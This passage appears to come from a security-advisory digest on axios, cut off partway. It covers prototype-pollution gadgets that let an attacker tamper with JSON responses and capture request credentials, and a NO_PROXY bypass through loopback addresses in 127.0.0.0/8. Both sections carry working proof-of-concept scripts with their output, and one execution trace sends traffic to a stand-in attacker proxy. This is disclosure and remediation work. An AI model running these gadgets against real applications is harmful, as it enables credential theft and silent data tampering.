When `Object.prototype` has been polluted by any co-dependency with keys that axios reads without a `hasOwnProperty` guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process -- lodash < 4.17.21, or any of several other common npm packages with known PP vectors. The two gadgets confirmed here work independently.

---

##### Background: how mergeConfig builds the config object

Every axios request goes through `Axios._request` in [`lib/core/Axios.js#L76`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L76):

```js
config = mergeConfig(this.defaults, config);
```

Inside `mergeConfig`, the merged config is built as a plain `{}` object ([`lib/core/mergeConfig.js#L20`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L20)):

```js
const config = {};
```

A plain `{}` inherits from `Object.prototype`. `mergeConfig` only iterates `Object.keys({ ...config1, ...config2 })` ([line 99](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L99)), which is a spread of own properties. Any key that is absent from both `this.defaults` and the per-request config will never be set as an own property on the merged config. Reading that key later on the merged config falls through to `Object.prototype`. That is the root mechanism behind all gadgets below.

---

##### Gadget 1: parseReviver -- response tampering and exfiltration

**Introduced in:** v1.12.0 (commit 2a97634, PR #&#8203;5926)
**Affected range:** >= 1.12.0, <= 1.13.6

##### Root cause

The default `transformResponse` function calls [`JSON.parse(data, this.parseReviver)`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js#L124):

```js
return JSON.parse(data, this.parseReviver);
```

`this` is the merged config. `parseReviver` is not present in `defaults` and is not in the `mergeMap` inside `mergeConfig`. It is never set as an own property on the merged config. Accessing `this.parseReviver` therefore walks the prototype chain.

The call fires by default on every string response body because [`lib/defaults/transitional.js#L5`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/defaults/transitional.js#L5) sets:

```js
forcedJSONParsing: true,
```

which activates the JSON parse path unconditionally when `responseType` is unset.

`JSON.parse(text, reviver)` calls the reviver for every key-value pair in the parsed result, bottom-up. The reviver's return value is what the caller receives. An attacker-controlled reviver can both observe every key-value pair and silently replace values.

There is no interaction with `assertOptions` here. The `assertOptions` call in `Axios._request` ([line 119](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L119)) iterates `Object.keys(config)`, and since `parseReviver` was never set as an own property, it is not in that list. Nothing validates or invokes the polluted function before `transformResponse` does.

##### Verification: own-property check

```js
import { createRequire } from 'module';
const require = createRequire(import.meta.url);
const mergeConfig = require('./lib/core/mergeConfig.js').default;
const defaults = require('./lib/defaults/index.js').default;

const merged = mergeConfig(defaults, { url: '/test', method: 'get' });
console.log(Object.prototype.hasOwnProperty.call(merged, 'parseReviver')); // false
console.log(merged.parseReviver); // undefined (no pollution)

Object.prototype.parseReviver = function(k, v) { return v; };
console.log(merged.parseReviver); // [Function (anonymous)] -- inherited
delete Object.prototype.parseReviver;
```

##### Proof of concept

Two terminals. The server simulates a legitimate API endpoint. The client simulates a Node.js application whose process has been affected by prototype pollution from a co-dependency.

**Terminal 1 -- server (`server_gadget1.mjs`):**

```js
import http from 'http';

const server = http.createServer((req, res) => {
  console.log('[server] request:', req.method, req.url);
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ role: 'user', balance: 100, token: 'tok_real_abc' }));
});

server.listen(19003, '127.0.0.1', () => {
  console.log('[server] listening on 127.0.0.1:19003');
});
```

```
$ node server_gadget1.mjs
[server] listening on 127.0.0.1:19003
[server] request: GET /
```

**Terminal 2 -- client (`poc_parsereviver.mjs`):**

```js
import axios from 'axios';

// Simulate pollution arriving from a co-dependency (e.g. lodash < 4.17.21 via _.merge).
// In a real application this would be set before any axios request runs.
Object.prototype.parseReviver = function (key, value) {
  // Called for every key-value pair in every JSON response parsed by axios in this process.
  if (key !== '') {
    // Exfiltrate: in a real attack this would POST to an attacker-controlled endpoint.
    console.log('[exfil]', key, '=', JSON.stringify(value));
  }
  // Tamper: escalate role, inflate balance.
  if (key === 'role') return 'admin';
  if (key === 'balance') return 999999;
  return value;
};

const res = await axios.get('http://127.0.0.1:19003/');
console.log('[app] received:', JSON.stringify(res.data));

delete Object.prototype.parseReviver;
```

```
$ node poc_parsereviver.mjs
[exfil] role = "user"
[exfil] balance = 100
[exfil] token = "tok_real_abc"
[app] received: {"role":"admin","balance":999999,"token":"tok_real_abc"}
```

The server sent `role: user`. The application received `role: admin`. The response is silently modified in place; no error is thrown, no log entry is produced.

---

##### Gadget 2: transport -- full HTTP request hijacking with credentials

**Introduced in:** early adapter refactor, present across 0.x and 1.x
**Affected range:** >= 0.19.0, <= 1.13.6 (Node.js http adapter only)

##### Root cause

Inside the Node.js http adapter at [`lib/adapters/http.js#L676`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L676):

```js
if (config.transport) {
  transport = config.transport;
}
```

`transport` is listed in `mergeMap` inside `mergeConfig` ([line 88](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L88)):

```js
transport: defaultToConfig2,
```

but it is not present in [`lib/defaults/index.js`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js) at all. `mergeConfig` iterates `Object.keys({ ...config1, ...config2 })` ([line 99](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L99)). Since `config1` (the defaults) has no `transport` key and a typical per-request config has none either, the key never enters the loop. It is never set as an own property on the merged config. The read at line 676 falls through to `Object.prototype`.

The fix in v1.13.5 (PR #&#8203;7369) added a `hasOwnProp` check for `mergeMap` access, but the iteration set itself is the issue -- `transport` simply never enters it. The fix does not address this.

The transport interface is `{ request(options, handleResponseCallback) }`. The options object passed to `transport.request` at adapter runtime contains:

- `options.hostname`, `options.port`, `options.path` -- full target URL
- `options.auth` -- basic auth credentials in `"username:password"` form (set at [line 606](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L606))
- `options.headers` -- all request headers as a plain object

##### Proof of concept

Two terminals. The server is a legitimate API endpoint that processes the request normally. The client's process has been affected by prototype pollution.

**Terminal 1 -- server (`server_gadget2.mjs`):**

```js
import http from 'http';

const server = http.createServer((req, res) => {
  console.log('[server] request:', req.method, req.url, 'auth:', req.headers.authorization || '(none)');
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end('{"ok":true}');
});

server.listen(19002, '127.0.0.1', () => {
  console.log('[server] listening on 127.0.0.1:19002');
});
```

```
$ node server_gadget2.mjs
[server] listening on 127.0.0.1:19002
[server] request: GET /api/users auth: Basic c3ZjX2FjY291bnQ6aHVudGVyMg==
```

**Terminal 2 -- client (`poc_transport.mjs`):**

```js
import axios from 'axios';
import http from 'http';

Object.prototype.transport = {
  request(options, handleResponse) {
    // Intercept: called for every outbound request in this process.
    console.log('[hijack] target:', options.hostname + ':' + options.port + options.path);
    console.log('[hijack] auth:', options.auth);
    console.log('[hijack] headers:', JSON.stringify(options.headers));
    // Forward to the real transport so the caller sees a normal 200.
    return http.request(options, handleResponse);
  },
};

const res = await axios.get('http://127.0.0.1:19002/api/users', {
  auth: { username: 'svc_account', password: 'hunter2' },
});
console.log('[app] response status:', res.status);

delete Object.prototype.transport;
```

```
$ node poc_transport.mjs
[hijack] target: 127.0.0.1:19002/api/users
[hijack] auth: svc_account:hunter2
[hijack] headers: {"Accept":"application/json, text/plain, */*","User-Agent":"axios/1.13.6","Accept-Encoding":"gzip, compress, deflate, br"}
[app] response status: 200
```

The basic auth credentials are fully visible to the attacker's transport function. The request completes normally from the caller's perspective.

---

##### Additional gadget: transformRequest / transformResponse

Separately, `mergeConfig` reads `config2[prop]` at [line 102](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102) without a `hasOwnProperty` guard. For keys like `transformRequest` and `transformResponse` that are present in `defaults` (and therefore processed by the mergeMap loop), if `Object.prototype.transformRequest` is polluted before the request, `config2["transformRequest"]` inherits the polluted value and `defaultToConfig2` replaces the safe default transforms with the attacker's function.

This one requires a discriminator because `assertOptions` in `Axios._request` ([line 119](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L119)) reads `schema[opt]` for every key in the merged config's own keys, and `schema["transformRequest"]` also inherits from `Object.prototype`, causing it to call the polluted value as a validator. The gadget function needs to return `true` when its first argument is a function (the assertOptions call) and perform the attack when its first argument is data (the [`transformData`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/transformData.js#L22) call).

Both `transformRequest` (fires with request body) and `transformResponse` (fires with response body) are confirmed affected. Range: >= 0.19.0, <= 1.13.6.

---

##### Why the existing fix does not cover these

PR #&#8203;7369 / CVE-2026-25639 (fixed in v1.13.5) addressed a separate class: passing `{"__proto__": {"x": 1}}` as the config object, which caused `mergeMap['__proto__']` to resolve to `Object.prototype` (a non-function), crashing axios. The fix added an explicit block on `__proto__`, `constructor`, and `prototype` as config keys, and changed `mergeMap[prop]` to `utils.hasOwnProp(mergeMap, prop) ? mergeMap[prop] : ...`.

That fix only addresses config keys that are explicitly set to `__proto__` (or similar) by the caller. It does not add `hasOwnProperty` guards on the value reads (`config2[prop]` at [line 102](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102), `this.parseReviver`, `config.transport`). An application using a PP-vulnerable co-dependency and making axios requests is still fully exposed after upgrading to 1.13.5 or 1.13.6.

---

##### Suggested fixes

For `parseReviver` ([`lib/defaults/index.js#L124`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js#L124)):
```js
const reviver = Object.prototype.hasOwnProperty.call(this, 'parseReviver') ? this.parseReviver : undefined;
return JSON.parse(data, reviver);
```

For `mergeConfig` value reads ([`lib/core/mergeConfig.js#L102`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102)):
```js
const configValue = merge(
  config1[prop],
  utils.hasOwnProp(config2, prop) ? config2[prop] : undefined,
  prop
);
```

For `transport` and other adapter reads from config ([`lib/adapters/http.js#L676`](https://redirect.github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L676)):
```js
if (utils.hasOwnProp(config, 'transport') && config.transport) {
  transport = config.transport;
}
```

The same `hasOwnProp` pattern applies to `lookup`, `httpVersion`, `http2Options`, `family`, and `formSerializer` reads in the adapter.

---

##### Environment

- axios: 1.13.6
- Node.js: 22.22.0
- OS: macOS 14
- Reproduction: confirmed in isolated test harness, both gadgets independently verified

##### Disclosure

Reported via GitHub Security Advisories at https://github.com/axios/axios/security/advisories/new per the axios security policy.

#### Severity
- CVSS Score: 7.4 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf](https://redirect.github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42033](https://nvd.nist.gov/vuln/detail/CVE-2026-42033)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-pf86-5x62-jrwf) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios: Incomplete Fix for CVE-2025-62718 — NO_PROXY Protection Bypassed via RFC 1122 Loopback Subnet (127.0.0.0/8) in Axios 1.15.0
[CVE-2026-42043](https://nvd.nist.gov/vuln/detail/CVE-2026-42043) / [GHSA-pmwg-cvhr-8vh7](https://redirect.github.com/advisories/GHSA-pmwg-cvhr-8vh7)

<details>
<summary>More information</summary>

#### Details
**1. Executive Summary**
This report documents an **incomplete security patch** for the previously disclosed vulnerability **GHSA-3p68-rc4w-qgx5 (CVE-2025-62718)**, which affects the `NO_PROXY` hostname resolution logic in the Axios HTTP library.

**Background — The Original Vulnerability**
The original vulnerability (GHSA-3p68-rc4w-qgx5) disclosed that Axios did not normalize hostnames before comparing them against `NO_PROXY` rules. Specifically, a request to `http://localhost./` (with a trailing dot) or `http://[::1]/` (with IPv6 bracket notation) would **bypass NO_PROXY matching entirely** and be forwarded to the configured HTTP proxy — even when `NO_PROXY=localhost,127.0.0.1,::1` was explicitly set by the developer to protect loopback services.

The Axios maintainers addressed this in **version 1.15.0** by introducing a `normalizeNoProxyHost()` function in `lib/helpers/shouldBypassProxy.js`, which strips trailing dots from hostnames and removes brackets from IPv6 literals before performing the NO_PROXY comparison.

**The Incomplete Patch — This Finding**
While the patch correctly addresses the specific cases reported (trailing dot normalization and IPv6 bracket removal), **the fix is architecturally incomplete**.

The patch introduced a hardcoded set of recognized loopback addresses:

```
// lib/helpers/shouldBypassProxy.js — Line 1
const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']);
```
However, **RFC 1122 §3.2.1.3** explicitly defines the **entire 127.0.0.0/8 subnet** as the IPv4 loopback address block not just the single address `127.0.0.1`. On all major operating systems (Linux, macOS, Windows with WSL), any IP address in the range `127.0.0.2` through `127.255.255.254` is a valid, functional loopback address that routes to the local machine.

As a result, an attacker who can influence the target URL of an Axios request can substitute 127.0.0.1 with any other address in the `127.0.0.0/8` range (e.g., `127.0.0.2`, `127.0.0.100`, `127.1.2.3`) to **completely bypass** the `NO_PROXY` protection even in the fully patched Axios 1.15.0 release.

**Verification**
This bypass has been **independently verified** on:

* **Axios version:** 1.15.0 (latest patched release)
* **Node.js version:** v22.16.0
* **OS:** Kali Linux (rolling)

The Proof-of-Concept demonstrates that while `localhost`, `localhost`., and `[::1]` are correctly blocked by the patched version, requests to `127.0.0.2`, `127.0.0.100`, and `127.1.2.3` are **transparently forwarded to the attacker-controlled proxy server**, confirming that the patch does not cover the full RFC-defined loopback address space.

**2. Deep-Dive: Technical Root Cause Analysis**
**2.1 Vulnerable File & Location**

| Field | Detail |
| ------------- | ------------- |
| File | lib/helpers/shouldBypassProxy.js| 
| Primary Flaw| isLoopback() — Line 1–3 |
| Supporting Function | shouldBypassProxy() — Line 59–110 |
| Axios Version | 1.15.0 (Latest Patched Release) |

**2.2 How Axios Routes HTTP Requests  The Call Chain**
When Axios dispatches any HTTP request, `lib/adapters/http.js` calls `setProxy()`, which invokes `shouldBypassProxy()` to decide whether to honour a configured proxy:

```
// lib/adapters/http.js — Lines 191–199
function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  if (!proxy && proxy !== false) {
    const proxyUrl = getProxyForUrl(location);   // Step 1: Read proxy env var
    if (proxyUrl) {
      if (!shouldBypassProxy(location)) {         // Step 2: Check NO_PROXY
        proxy = new URL(proxyUrl);               // Step 3: Assign proxy
      }
    }
  }
}
```
`shouldBypassProxy()` is the **single gatekeeper** for NO_PROXY enforcement. A bypass here means all proxy protection fails silently.

**2.3 The Original Vulnerability (GHSA-3p68-rc4w-qgx5)**
Before Axios 1.15.0, hostnames were compared against `NO_PROXY` using a **raw literal string match** with no normalization:

```
Request URL → http://localhost./secret
NO_PROXY    → "localhost,127.0.0.1,::1"
Comparison:
  "localhost." === "localhost"   →  FALSE  →  Proxy used  ← BYPASS
  "[::1]"     === "::1"         →  FALSE  →  Proxy used  ← BYPASS
```
Both `localhost.` (FQDN trailing dot, RFC 1034 §3.1) and `[::1]` (bracketed IPv6 literal, RFC 3986 §3.2.2) are **canonical representations of loopback addresses**, but Axios treated them as unknown hosts.

**2.4 What the Patch Fixed (Axios 1.15.0)**
The patch introduced three changes inside `lib/helpers/shouldBypassProxy.js`:

<img width="602" height="123" alt="01_axios_version_verification" src="https://github.com/user-attachments/assets/844446f2-01fb-4933-9316-fb849c40c8f5" />

**Fix A `normalizeNoProxyHost()` (Lines 47–57)**
Strips alternate representations before comparison:

```
const normalizeNoProxyHost = (hostname) => {
  if (!hostname) return hostname;
  // Remove IPv6 brackets: "[::1]" → "::1"
  if (hostname.charAt(0) === '[' && hostname.charAt(hostname.length - 1) === ']') {
    hostname = hostname.slice(1, -1);
  }
  // Strip trailing FQDN dot: "localhost." → "localhost"
  return hostname.replace(/\.+$/, '');
};
```
**Fix B Cross-Loopback Equivalence (Lines 1–3 & 108)**
Allows `127.0.0.1` and `localhost` to match each other interchangeably:

```
const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']);
const isLoopback = (host) => LOOPBACK_ADDRESSES.has(host);
// Line 108 — Final match condition:
return hostname === entryHost
    || (isLoopback(hostname) && isLoopback(entryHost));
//      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
//      If both sides are "loopback" → treat as match
```

**Fix C Normalization Applied on Both Sides (Lines 81 & 90)**

```
// Request hostname normalized:
const hostname = normalizeNoProxyHost(parsed.hostname.toLowerCase());
// Each NO_PROXY entry normalized:
entryHost = normalizeNoProxyHost(entryHost);
```

**2.5 The Incomplete Patch Exact Root Cause**
The fundamental flaw resides in Line 1:

```
// lib/helpers/shouldBypassProxy.js — Line 1  ← ROOT CAUSE
const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']);
//                                              ^^^^^^^^^^^
//                              Only ONE IPv4 loopback address is recognized.
//                              The entire 127.0.0.0/8 subnet is unaccounted for.
// Line 3 — Lookup against this incomplete set:
const isLoopback = (host) => LOOPBACK_ADDRESSES.has(host);
//                                               ^^^^^^^^^
//                          Returns FALSE for any 127.x.x.x ≠ 127.0.0.1
```
<img width="884" height="135" alt="02_vulnerable_code_loopback_addresses" src="https://github.com/user-attachments/assets/ba06b91e-a2d2-4a99-9e1f-8c8bfbb6d71e" />

***RFC 1122 §3.2.1.3 is unambiguous:**

> "The address 127.0.0.0/8 is assigned for loopback. A datagram sent by a higher-level protocol to a loopback address MUST NOT appear on any network."

This means all addresses from `127.0.0.1` through `127.255.255.254` are valid loopback addresses on any RFC-compliant operating system. On Linux, the entire `/8` block is routed to the `lo` interface by default. The patch recognises only `127.0.0.1`, leaving `16,777,213` valid loopback addresses unprotected.

<img width="884" height="537" alt="03_rfc1122_loopback_definition" src="https://github.com/user-attachments/assets/951eabb4-2ec6-40ef-ad00-1fd5b9aed2d0" />

**2.6 Step-by-Step Bypass Execution Trace**
Environment:

```
NO_PROXY   = "localhost,127.0.0.1,::1"
HTTP_PROXY = "http://attacker-proxy:5300"
Target URL = "http://127.0.0.2:9191/internal-api"
```
**Annotated execution of shouldBypassProxy("http://127.0.0.2:9191/internal-api"):**

```
// Step 1 — Parse the request URL
parsed   = new URL("http://127.0.0.2:9191/internal-api")
hostname = "127.0.0.2"    // parsed.hostname
// Step 2 — Read NO_PROXY environment variable
noProxy  = "localhost,127.0.0.1,::1"   // lowercased
// Step 3 — Normalize the request hostname
hostname = normalizeNoProxyHost("127.0.0.2")
//          No brackets → skip
//          No trailing dot → skip
//          Result: "127.0.0.2"  (unchanged)
// Step 4 — Iterate over NO_PROXY entries
//  Entry → "localhost"
entryHost = "localhost"
"127.0.0.2" === "localhost"                  → false
isLoopback("127.0.0.2")                      → false  ← Set.has() returns false
                                                          BYPASS starts here
//  Entry → "127.0.0.1"
entryHost = "127.0.0.1"
"127.0.0.2" === "127.0.0.1"                 → false
isLoopback("127.0.0.2") && isLoopback("127.0.0.1")
  → LOOPBACK_ADDRESSES.has("127.0.0.2")     → false  ← Same failure
  → false
//  Entry → "::1"
entryHost = "::1"
"127.0.0.2" === "::1"                        → false
isLoopback("127.0.0.2") && isLoopback("::1")
  → LOOPBACK_ADDRESSES.has("127.0.0.2")     → false  ← Same failure
  → false
// Step 5 — Final return
shouldBypassProxy() → false
//  Axios proceeds to route the request through the configured proxy.
//  The attacker's proxy server receives the full request including headers
//  and any response from the internal service.
```

**2.7 Why the Patch Design Is Flawed**
The patch addresses the **symptom** (two specific alternate representations) rather than the **root cause** (an incomplete definition of what constitutes a loopback address).

| Aspect | Original Bug | This Finding |
| ------------- | ------------- | ------------- |
| What was wrong | No normalization before comparison | Incomplete loopback address set|
| Fix applied | Added normalizeNoProxyHost() | None set remains hardcoded |
| RFC compliance | Violated RFC 1034 & RFC 3986 | Violates RFC 1122 §3.2.1.3 |
| Bypass method | Alternate string representation | Alternate valid loopback address |
| Impact | NO_PROXY bypass → SSRF | NO_PROXY bypass → SSRF (identical) |

```
**2.8 Total Exposed Address Space**
Protected by patch:    127.0.0.1          (1 address)
Unprotected loopback:  127.0.0.2
                       through
                       127.255.255.254    (16,777,213 addresses)
```
Real-world services that commonly bind to non-standard loopback addresses include:

* Internal microservices and admin dashboards using dedicated loopback IPs
* Development environments with multiple isolated service instances
* Docker and container bridge network configurations
* Test infrastructure allocating sequential loopback IPs across services

**3. Comprehensive Attack Vector & Proof of Concept**

**3.1 Reproduction Steps**

Step 1 — Create a fresh project directory
```
mkdir axios-bypass-test && cd axios-bypass-test
```
**Step 2 — Initialize the project with the patched Axios version**
Create `package.json`:

```
{
  "type": "module",
  "dependencies": {
    "axios": "1.15.0"
  }
}
```
Install dependencies:

```
npm install
```
Verify the installed version:

```
npm list axios

##### Expected output: axios@1.15.0
```

**Step 3 — Create the PoC file (`poc.js`)**

```
import http from 'http';
import axios from 'axios';
// ── Simulated attacker-controlled proxy server ────────────────────────────────
const PROXY_PORT = 5300;
http.createServer((req, res) => {
  console.log('\n[!] PROXY HIT — Attacker proxy received request!');
  console.log(`    Method : ${req.method}`);
  console.log(`    URL    : ${req.url}`);
  console.log(`    Host   : ${req.headers.host}`);
  res.writeHead(200);
  res.end('proxied');
}).listen(PROXY_PORT);
// ── Simulated developer security configuration ────────────────────────────────
// Developer believes all loopback traffic is protected by NO_PROXY.
process.env.HTTP_PROXY = `http://127.0.0.1:${PROXY_PORT}`;
process.env.NO_PROXY   = 'localhost,127.0.0.1,::1';
// ── Test helper ───────────────────────────────────────────────────────────────
async function test(url) {
  console.log(`\n[*] Testing: ${url}`);
  try {
    const res = await axios.get(url, { timeout: 2000 });
    if (res.data === 'proxied') {
      console.log('    Result → [PROXIED]  ← BYPASS CONFIRMED');
    } else {
      console.log('    Result → [DIRECT]   ← Safe, no proxy used');
    }
  } catch (err) {
    if (err.code === 'ECONNREFUSED') {
      console.log('    Result → [DIRECT]   ← ECONNREFUSED (request did not go through proxy)');
    }
  }
}
// ── Test execution ────────────────────────────────────────────────────────────
setTimeout(async () => {
  // Section A: Cases fixed by the existing patch — expected to go DIRECT
  console.log('\n=== PATCHED CASES (Expected: All requests bypass the proxy) ===');
  await test('http://localhost:9191/secret');
  await test('http://localhost.:9191/secret');
  await test('http://[::1]:9191/secret');
  // Section B: Bypass cases — expected to go DIRECT, but actually go through proxy
  console.log('\n=== BYPASS CASES (Expected: bypass proxy | Actual: routed through proxy) ===');
  await test('http://127.0.0.2:9191/secret');
  await test('http://127.0.0.100:9191/secret');
  await test('http://127.1.2.3:9191/secret');
  process.exit(0);
}, 500);
```

**Step 4 — Execute the PoC**

```
node poc.js
```

**3.2 Observed Output**
The following output was captured during testing on Kali Linux with Axios 1.15.0:

```
=== PATCHED CASES (Expected: All requests bypass the proxy) ===
[*] Testing: http://localhost:9191/secret
    Result → [DIRECT]   ← ECONNREFUSED (request did not go through proxy)  
[*] Testing: http://localhost.:9191/secret
    Result → [DIRECT]   ← ECONNREFUSED (request did not go through proxy)  
[*] Testing: http://[::1]:9191/secret
    Result → [DIRECT]   ← ECONNREFUSED (request did not go through proxy)  
=== BYPASS CASES (Expected: bypass proxy | Actual: routed through proxy) ===
[*] Testing: http://127.0.0.2:9191/secret
[!] PROXY HIT — Attacker proxy received request!
    Method : GET
    URL    : http://127.0.0.2:9191/secret
    Host   : 127.0.0.2:9191
    Result → [PROXIED]  ← BYPASS CONFIRMED                                 
[*] Testing: http://127.0.0.100:9191/secret
[!] PROXY HIT — Attacker proxy received request!
    Method : GET
    URL    : http://127.0.0.100:9191/secret
    Host   : 127.0.0.100:9191
    Result → [PROXIED]  ← BYPASS CONFIRMED                                 
[*] Testing: http://127.1.2.3:9191/secret
[!] PROXY HIT — Attacker proxy received request!
    Method : GET
    URL    : http://127.1.2.3:9191/secret
    Host   : 127.1.2.3:9191
    Result → [PROXIED]  ← BYPASS CONFIRMED                                 
```
<img width="1621" height="739" alt="05_poc_execution_bypass_confirmed" src="https://github.com/user-attachments/assets/6caf9f7a-36ed-4feb-b9f3-f82532da2de7" />

**3.3 Analysis of Results**
The output conclusively demonstrates the following:

**Patched cases behave correctly:** Requests to `localhost`, `localhost.` (trailing dot), and `[::1]` (bracketed IPv6) all result in a direct connection, confirming that the existing patch in Axios 1.15.0 correctly handles the cases reported in GHSA-3p68-rc4w-qgx5.

**Bypass cases confirm the incomplete patch:** Requests to `127.0.0.2`, `127.0.0.100`, and `127.1.2.3` all of which are valid loopback addresses within the `127.0.0.0/8` subnet as defined by `RFC 1122 §3.2.1.3` are transparently forwarded to the attacker-controlled proxy server. The proxy receives the full request including the HTTP method, target URL, and `Host` header, demonstrating that any response from an internal service bound to these addresses would be fully intercepted.

This confirms that the `NO_PROXY` protection configured by the developer (`localhost,127.0.0.1,::1`) fails silently for the entire `127.0.0.0/8` address range beyond `127.0.0.1`, providing a reproducible and reliable bypass of the security control introduced by the patch.

**4. Impact Assessment**
This vulnerability is a **security control bypass** specifically an incomplete patch that allows an attacker to circumvent the `NO_PROXY` protection mechanism in Axios by using any loopback addresses within the `127.0.0.0/8` subnet other than `127.0.0.1`. The result is that traffic intended to remain private and direct is silently intercepted by a configured proxy server.

**4.1 Who Is Impacted?**

Primary Target — Node.js Backend Applications
Any Node.js application that meets **all three of the following conditions** is vulnerable:

```
Condition 1:  Uses Axios 1.15.0 (latest patched) for HTTP requests
Condition 2:  Has HTTP_PROXY or HTTPS_PROXY set in its environment
              (common in corporate networks, cloud deployments,
               containerised environments, and CI/CD pipelines)
Condition 3:  Relies on NO_PROXY=localhost,127.0.0.1,::1 (or similar)
              to protect loopback or internal services from proxy routing
```
**Affected Deployment Environments**
| Environment | Risk Level |
| ------------- | ------------- |
| Cloud-hosted applications (AWS, GCP, Azure) | Critical| 
| Containerised microservices (Docker, Kubernetes) | Critical| 
| Corporate networks with mandatory proxy | High| 
| CI/CD pipelines with proxy environment variables | High| 
| On-premise servers with internal proxy | High| 

**Scale of Exposure**
Axios is one of the most widely used HTTP client libraries in the JavaScript ecosystem, with over **500 million weekly downloads** on npm. Any application in the above categories using Axios 1.15.0 is affected, regardless of whether the developer is aware of the underlying proxy routing logic.

**4.3 Impact Details**

**Impact 1 Silent Interception of Internal Service Traffic**

When an application makes a request to an internal loopback service using a non-standard loopback address (e.g., `http://127.0.0.2/admin`), Axios silently routes the request through the configured proxy instead of connecting directly.

```
Developer expects:    Application → 127.0.0.2:8080 (direct)
Actual behaviour:     Application → Attacker Proxy → 127.0.0.2:8080
The proxy receives:
  - Full request URL
  - HTTP method
  - All request headers (including Authorization, Cookie, API keys)
  - Request body (for POST/PUT requests)
  - Full response from the internal service
```
The developer receives no error or warning. From the application's perspective, the request succeeds normally.

**Impact 2 — SSRF Mitigation Bypass**
Many applications implement SSRF protections by configuring `NO_PROXY` to prevent requests to loopback addresses from being forwarded externally. This bypass defeats that protection entirely for any loopback address beyond `127.0.0.1`.

```
SSRF Protection (as configured by developer):
  NO_PROXY = localhost,127.0.0.1,::1
What developer believes is protected:
  All loopback/internal addresses
What is actually protected:
  Only: localhost, 127.0.0.1, ::1 (3 of 16,777,216 loopback addresses)
What remains exposed:
  127.0.0.2 through 127.255.255.254 (16,777,213 addresses)
```
An attacker who can influence the target URL of an Axios request through user-supplied input, redirect chains, or other SSRF vectors can exploit this gap to reach internal services that the developer explicitly intended to protect.

**Impact 3 — Cloud Metadata Service Exposure**
In cloud environments (AWS, GCP, Azure), SSRF vulnerabilities are particularly severe because they can be used to access the instance metadata service and retrieve IAM credentials, enabling full cloud account compromise.

While the AWS IMDSv2 service is reachable at `169.254.169.254` (not a loopback address), many cloud deployments run internal metadata proxies, credential servers, or service discovery endpoints bound to non-standard loopback addresses within the `127.0.0.0/8` range. An attacker reaching any of these services through the bypass could:

* Retrieve temporary IAM credentials
* Access environment variables containing secrets
* Enumerate internal service configurations
* Pivot to other internal services via the compromised credentials

**Impact 4 — Confidential Data Exfiltration**
Any internal service binding to a `127.x.x.x` address other than `127.0.0.1` is fully exposed. This includes:

| Internal Service Type | Exposed Data |
| ------------- | ------------- |
| Admin panels / dashboards | User data, configuration, logs | 
| Internal APIs | Business logic, database contents | 
| Secret managers / vaults | API keys, tokens, certificates | 
| Health check endpoints | Infrastructure topology | 
| Development services | Source code, environment variables | 

**Impact 5 — No Indication of Compromise**
A particularly dangerous characteristic of this vulnerability is that it is **completely silent** neither the application nor the developer receives any indication that requests are being routed incorrectly. There are no error messages, no exceptions thrown, and no changes in application behaviour. The proxy interception is entirely transparent from the application's perspective, making detection extremely difficult without active network monitoring.

**4.4 Comparison with Original Vulnerability**

| Internal Service Type | Exposed Data | Exposed Data |
| ------------- | ------------- | ------------- |
| Attack method | Use localhost. or [::1]| Use any 127.x.x.x ≠ 127.0.0.1 | 
| Patch status | Fixed in 1.15.0 | Not fixed in 1.15.0 | 
| CVSS score | 9.3 Critical | 9.9 Critical or (equivalent) | 
| Attacker effort| Trivial | Trivial | 
| Detection by developer | None | None | 
| Impact | SSRF / proxy bypass | SSRF / proxy bypass (identical) | 

The severity of this finding is equivalent to the original vulnerability because the attack conditions, exploitation technique, and resulting impact are identical. The only difference is the specific input used to trigger the bypass, which the existing patch completely fails to address.

**5. Technical Remediation & Proposed Fix**

**5.1 Vulnerable Code Block**

The vulnerability resides in `lib/helpers/shouldBypassProxy.js` at lines 1–3. The following is the exact code extracted from Axios 1.15.0:

```
// lib/helpers/shouldBypassProxy.js — Axios 1.15.0
// Lines 1–3 (VULNERABLE)
